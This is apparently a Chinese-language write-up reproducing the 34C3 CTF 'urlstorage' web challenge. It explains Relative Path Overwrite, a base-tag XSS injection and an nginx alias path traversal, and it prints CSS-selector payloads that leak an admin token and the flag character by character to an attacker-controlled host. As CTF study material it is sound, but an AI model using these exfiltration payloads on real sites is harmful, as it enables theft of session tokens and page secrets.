34c3ctf-urlstorage复现

拿34c3ctf的一道题学习一下rpo漏洞和django的配置

测试环境

Github上的一个CTF题目的源码，利用RPO，进行XSS+CSRF攻击。

https://github.com/eboda/34c3ctf/tree/master/urlstorage

ps: build的时候，发现mysql服务起不来，排了下错，发现是权限问题，修改Dockerfile文件，在起mysql服务前加上chown -R mysql:mysql /var/lib/mysql解决。

RPO（Relative Path Overwrite）

描述：

RPO（Relative Path Overwrite）相对路径覆盖，主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞，通过一些技巧，我们可以通过相对路径来引入其他的资源文件，以至于达成我们想要的目的。

利用方法

1.加载任意目录下静态资源文件

就是通过相对路径加载不同路径下的其他同名js/css文件。

2.将返回内容按静态文件解析

在很多使用了url_rewrite的php开发框架以及python web框架中，经常使用相对路径来加载静态资源文件，而且url都有一个特征。
比如/rpo/user/id/1，这里表示使用参数为id，值为1的内容访问user接口；
比如/rpo/user.php/name/tester，这里表示使用参数name，内容为tester的内容访问user.php文件等。
本题里，正常的链接是这样的：

image.png

我们访问这样一个链接，发现还是返回了原内容，但是没有css的解析。

image.png

css的解析地址是：

image.png

正常的网站访问，就会去访问/static/css/milligram.min.css,获取到css文件，而第二次访问，虽然由于url_rewrite,也返回了网页内容，css地址被认为是/urlstorage/static/css/milligram.min.css，所以没有被解析。而又由于url_rewrite，返回内容就是文件内容，我们如果控制其中的内容，利用CSS在加载的时候与JS一样是逐行解析的，不同的是CSS会忽略页面中不符合CSS语法的行，可以将文件内容按照静态文件解析。
比如输入:%0a{}%0aurl:{}*{color:red}

image.png

返回的文本被当作静态文件解析了。

回到题目

题目有几个发现。
1.在urstorage页面存在csrf，可以任意修改他人的url链接，结合css加载可构成rop。

image.png

2.在contact页面存在ssrf,提交的所有链接会被管理员点击。
3.在flag页面token存在跨站。

通过观察页面可以知道真正的flag在管理员的flag页面里。
根据https://lorexxar.cn/2017/10/25/csp-paper/#1、nonce-script-CSP-Bypass里提到的CSS选择器来读取页面内容，可以形成攻击思路，利用contact页面提交的链接，修改管理员的url内容，让其加载我们指定的css样式，我们读取其页面内容。
我们的目的是读取flag,读取flag需要首先知道管理员的token值，所以我们第一步是要通过urlstorage页面读取其token，另外在flag页面无法直接构成rop，需要知道另一个知识。

在浏览器处理相对路径时，一般情况是获取当前url的最后一个/前作为base url，但是如果页面中给出了
base标签，那么就会读取base标签中的url作为base url。

而这题在flag页面存在跨站，跨站点就在head标签里，所以正好可以利用其构成base标签。

http://192.168.42.134:8080/flag?token=cdebcc090a8b4e339b876c33ad1c0acb%3C/title%3E%3Cbase%20href=urlstorage/123%3E

image.png

获取管理员token。
通过语句：

a[href^=flag\?token\=0]{background: url(//192.168.8.143/ctf/ans.php?ans=0);}
a[href^=flag\?token\=1]{background: url(//192.168.8.143/ctf/ans.php?ans=1);}
......
a[href^=flag\?token\=f]{background: url(//192.168.8.143/ctf/ans.php?ans=f);}

之后获取flag：
有个坑点css选择器在匹配的时候首字符不能是数字。因为flag的格式是34c3_，可以用以下两种方式解决：

1、使用css的*模糊匹配
#flag[value*=C3_1]{background: url(http://xxx.pw/?flag=C3_1);}
2、使用16进制编码
#flag[value^=\33\34\43\33]{background: url(http://xxx.pw/?34c3);}

还有个坑点，提交链接后提示，管理员只会花3秒钟处理你的链接，而3秒钟连token都跑不出来，并且每次管理员访问你的链接都会更新token,所以要求我们一次性完成获取flag。
这里要用到题目给的一个pow.py,用脚本跑出一个解并提交，管理员就会用30秒处理你的链接。
大佬的代码（膜拜）：

https://github.com/eboda/34c3ctf/edit/master/urlstorage/exploit/exploit.php

nginx配置错误导致目录穿越

这道题还有一个非预期解。
在于题目使用了Nginx做反向代理，动态的部分被proxy_pass传递给后端端口，而静态文件需要Nginx来处理。
而Nginx在配置时，url上startic没有加后缀，后面的alias加了后缀‘/’，这个/就导致我们可以从/static/目录穿越到它的上层目录。

image.png

image.png

可以直接读取到flag:

image.png

参考：http://blog.nsfocus.net/rpo-attack/
参考：https://paper.seebug.org/493/
参考：https://lorexxar.cn/2017/10/25/csp-paper/